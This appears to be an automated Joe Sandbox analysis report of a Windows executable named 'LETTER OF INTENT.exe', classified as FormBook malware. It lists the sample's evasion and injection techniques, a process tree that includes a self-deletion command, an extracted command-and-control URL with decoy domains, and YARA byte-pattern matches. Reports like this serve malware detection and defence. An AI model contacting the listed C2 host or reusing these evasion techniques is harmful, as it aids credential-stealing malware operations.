Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LETTER OF INTENT.exe

Overview

General Information

Sample Name:LETTER OF INTENT.exe
Analysis ID:574776
MD5:b3f43a58149d9058f8c39455869c2f84
SHA1:8f3d20b2f71e7331c355e2926a5fc5ce71e72eb8
SHA256:a04a4acf00f50f8b3c3bea38914813aa75ce4ba8c30c08971a6094c492d0d41d
Tags:exeFormbookxloader
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • LETTER OF INTENT.exe (PID: 6272 cmdline: "C:\Users\user\Desktop\LETTER OF INTENT.exe" MD5: B3F43A58149D9058F8C39455869C2F84)
    • LETTER OF INTENT.exe (PID: 6332 cmdline: C:\Users\user\Desktop\LETTER OF INTENT.exe MD5: B3F43A58149D9058F8C39455869C2F84)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 4528 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 5044 cmdline: /c del "C:\Users\user\Desktop\LETTER OF INTENT.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • explorer.exe (PID: 1692 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 6892 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.czzhudi.com/uar3/"], "decoy": ["jogoreviravolta.com", "keysine.com", "sami60.com", "morganators.com", "referral.directory", "campdiscount.info", "vanwah.com", "jmtmjz.com", "der-transformationscode.com", "evangelvalormedia.com", "bedsidehomecare.com", "novaair.net", "privilegetroissecurity.com", "elsiepupz.com", "yy77kk.com", "nt-renewable.com", "alyaqoutalabyadhautoparts.com", "start-play-now.com", "myskew.com", "himalaya-finance.com", "purwojati.com", "freedomteaminc.com", "byaliciafryearson.com", "robocats.xyz", "eumjugamu.net", "bestofverona.guide", "aeropatrol.net", "nikisankala.com", "klassociates.info", "centroimprenta.xyz", "xn--pckwb0cye6947ajzku8opzi.com", "wasserstoff-station.net", "finpro.tech", "hydrocheats.com", "theapplewatchdoctor.com", "awridahmed.com", "barrcoplumbingsupply.com", "nbhard.com", "32342240.xyz", "photo.fail", "rebornmkt.com", "gzfs158.com", "db-propertygroup.com", "krpano.pro", "globalsovereignbank.com", "moonshot.properties", "adanary.com", "collegesecurityroadshow.net", "ddsadvocacia.com", "seo-python.com", "5gjpu.xyz", "riskprotek.com", "luckbim.com", "theperfecttrainer.com", "taxyragl.website", "ban-click.com", "mystore.guide", "katchybugonsale.com", "chinadqwx.com", "e-scooters.frl", "hentainftxxx.com", "52zf.icu", "dbhong.com", "escortworks.xyz"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.245569266.000000000340A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
      • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
      • 0x16af8:$sqlite3text: 68 38 2A 90 C5
      • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
      • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
      00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 30 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.0.LETTER OF INTENT.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.0.LETTER OF INTENT.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          1.0.LETTER OF INTENT.exe.400000.8.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x15cc9:$sqlite3step: 68 34 1C 7B E1
          • 0x15ddc:$sqlite3step: 68 34 1C 7B E1
          • 0x15cf8:$sqlite3text: 68 38 2A 90 C5
          • 0x15e1d:$sqlite3text: 68 38 2A 90 C5
          • 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
          0.2.LETTER OF INTENT.exe.4771d60.4.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            0.2.LETTER OF INTENT.exe.4771d60.4.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x33228:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x335b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x5c048:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x5c3d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x83e68:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x841f2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x3f2c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x680e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x8ff05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x3edb1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x67bd1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x8f9f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x3f3c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x681e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x90007:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x3f53f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x6835f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x9017f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x33fca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x5cdea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x84c0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            Click to see the 27 entries

            Sigma Signatures

            There are no malicious signatures, click here to show all signatures.

            Source: Process startedAuthor: frack113: Data: Command: C:\Users\user\Desktop\LETTER OF INTENT.exe, CommandLine: C:\Users\user\Desktop\LETTER OF INTENT.exe, CommandLine|base64offset|contains: 8, Image: C:\Users\user\Desktop\LETTER OF INTENT.exe, NewProcessName: C:\Users\user\Desktop\LETTER OF INTENT.exe, OriginalFileName: C:\Users\user\Desktop\LETTER OF INTENT.exe, ParentCommandLine: "C:\Users\user\Desktop\LETTER OF INTENT.exe" , ParentImage: C:\Users\user\Desktop\LETTER OF INTENT.exe, ParentProcessId: 6272, ProcessCommandLine: C:\Users\user\Desktop\LETTER OF INTENT.exe, ProcessId: 6332

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.czzhudi.com/uar3/"], "decoy": ["jogoreviravolta.com", "keysine.com", "sami60.com", "morganators.com", "referral.directory", "campdiscount.info", "vanwah.com", "jmtmjz.com", "der-transformationscode.com", "evangelvalormedia.com", "bedsidehomecare.com", "novaair.net", "privilegetroissecurity.com", "elsiepupz.com", "yy77kk.com", "nt-renewable.com", "alyaqoutalabyadhautoparts.com", "start-play-now.com", "myskew.com", "himalaya-finance.com", "purwojati.com", "freedomteaminc.com", "byaliciafryearson.com", "robocats.xyz", "eumjugamu.net", "bestofverona.guide", "aeropatrol.net", "nikisankala.com", "klassociates.info", "centroimprenta.xyz", "xn--pckwb0cye6947ajzku8opzi.com", "wasserstoff-station.net", "finpro.tech", "hydrocheats.com", "theapplewatchdoctor.com", "awridahmed.com", "barrcoplumbingsupply.com", "nbhard.com", "32342240.xyz", "photo.fail", "rebornmkt.com", "gzfs158.com", "db-propertygroup.com", "krpano.pro", "globalsovereignbank.com", "moonshot.properties", "adanary.com", "collegesecurityroadshow.net", "ddsadvocacia.com", "seo-python.com", "5gjpu.xyz", "riskprotek.com", "luckbim.com", "theperfecttrainer.com", "taxyragl.website", "ban-click.com", "mystore.guide", "katchybugonsale.com", "chinadqwx.com", "e-scooters.frl", "hentainftxxx.com", "52zf.icu", "dbhong.com", "escortworks.xyz"]}
            Multi AV Scanner detection for submitted file
            Source: LETTER OF INTENT.exeVirustotal: Detection: 25%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 1.0.LETTER OF INTENT.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.LETTER OF INTENT.exe.4771d60.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.LETTER OF INTENT.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.LETTER OF INTENT.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.LETTER OF INTENT.exe.469f500.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.LETTER OF INTENT.exe.4747140.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.LETTER OF INTENT.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.LETTER OF INTENT.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.LETTER OF INTENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.LETTER OF INTENT.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.288819841.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.307789008.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.506165216.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000000.242299044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.274895699.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000000.242704154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: 1.0.LETTER OF INTENT.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 1.2.LETTER OF INTENT.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 1.0.LETTER OF INTENT.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 1.0.LETTER OF INTENT.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: LETTER OF INTENT.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: LETTER OF INTENT.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: ipconfig.pdb source: LETTER OF INTENT.exe, 00000001.00000002.307642624.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, LETTER OF INTENT.exe, 00000001.00000002.307957753.0000000001150000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: ipconfig.pdbGCTL source: LETTER OF INTENT.exe, 00000001.00000002.307642624.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, LETTER OF INTENT.exe, 00000001.00000002.307957753.0000000001150000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: LETTER OF INTENT.exe, 00000001.00000002.308765964.000000000129F000.00000040.00000800.00020000.00000000.sdmp, LETTER OF INTENT.exe, 00000001.00000002.307985320.0000000001180000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: LETTER OF INTENT.exe, 00000001.00000002.308765964.000000000129F000.00000040.00000800.00020000.00000000.sdmp, LETTER OF INTENT.exe, 00000001.00000002.307985320.0000000001180000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 4x nop then pop edi1_2_00415672
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi15_2_02A15672

            Networking

            barindex
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: www.czzhudi.com/uar3/

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.0.LETTER OF INTENT.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.LETTER OF INTENT.exe.4771d60.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.LETTER OF INTENT.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.LETTER OF INTENT.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.LETTER OF INTENT.exe.469f500.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.LETTER OF INTENT.exe.4747140.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.LETTER OF INTENT.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.LETTER OF INTENT.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.LETTER OF INTENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.LETTER OF INTENT.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.288819841.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.307789008.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.506165216.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000000.242299044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.274895699.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000000.242704154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.0.LETTER OF INTENT.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.0.LETTER OF INTENT.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.LETTER OF INTENT.exe.4771d60.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.LETTER OF INTENT.exe.4771d60.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.0.LETTER OF INTENT.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.0.LETTER OF INTENT.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.LETTER OF INTENT.exe.342a3e4.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
            Source: 1.2.LETTER OF INTENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.LETTER OF INTENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.LETTER OF INTENT.exe.469f500.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.LETTER OF INTENT.exe.469f500.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.LETTER OF INTENT.exe.4747140.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.LETTER OF INTENT.exe.4747140.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.0.LETTER OF INTENT.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.0.LETTER OF INTENT.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.0.LETTER OF INTENT.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.0.LETTER OF INTENT.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.LETTER OF INTENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.LETTER OF INTENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.0.LETTER OF INTENT.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.0.LETTER OF INTENT.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.288819841.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000000.288819841.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.307789008.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.307789008.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.506165216.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.506165216.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000000.242299044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000000.242299044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.274895699.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000000.274895699.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000000.242704154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000000.242704154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            .NET source code contains very large strings
            Source: LETTER OF INTENT.exe, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.csLong String: Length: 53248
            Source: 0.0.LETTER OF INTENT.exe.fd0000.0.unpack, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.csLong String: Length: 53248
            Source: 1.0.LETTER OF INTENT.exe.670000.9.unpack, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.csLong String: Length: 53248
            Source: 1.0.LETTER OF INTENT.exe.670000.1.unpack, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.csLong String: Length: 53248
            Source: 1.0.LETTER OF INTENT.exe.670000.0.unpack, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.csLong String: Length: 53248
            Source: 1.0.LETTER OF INTENT.exe.670000.7.unpack, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.csLong String: Length: 53248
            Source: LETTER OF INTENT.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 1.0.LETTER OF INTENT.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
